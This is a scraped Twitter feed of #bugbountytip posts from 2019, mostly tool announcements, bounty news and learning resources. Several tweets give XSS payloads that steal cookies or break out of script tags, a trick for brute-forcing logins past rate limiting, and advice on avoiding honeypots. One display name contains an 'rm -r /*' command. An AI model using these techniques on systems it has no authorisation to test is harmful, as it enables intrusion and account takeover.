@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers? It's not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can wreck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluzđŸ”„
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluzđŸ”„
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap
https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
ΛяĐČєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, its a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If you're struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If you're not looking for these on your bug bounties you're missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like its Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading a malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I'm starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 đŸ‡ŠđŸ‡·
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi đŸ•Šïž
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip đŸ’Ș Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix its #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💾 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌮
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! 👀 @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! 📩🔓#BugBountyTip 👉 https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Android’s most popular apps Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Google’s bug bounty programs paid out almost $3M in 2017 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate 🌮
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() weren’t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluzđŸ”„
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip 👍
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge 💰💰💰💰 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec 🚀
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - 💰💰💰💰 https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
propers[email protected]:~$ sud€ rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
0 Web App owners: We are very secured nd safe from #Hackers. 😹😹 #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404’s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learn that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate in real systems. Please comment if you find a honeypot. 🙏 #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
👣
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload 😉 #BugBounty #BugBountyTip
Murdockz
@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate field" Company: ".........." 🥴😂😅 btw this is a Ruby built API 🤪 #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum 🇹🇳
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (😱), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty — Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analizying the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads – A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
გოჩა ოჄრაძე (Gocha Okradze)
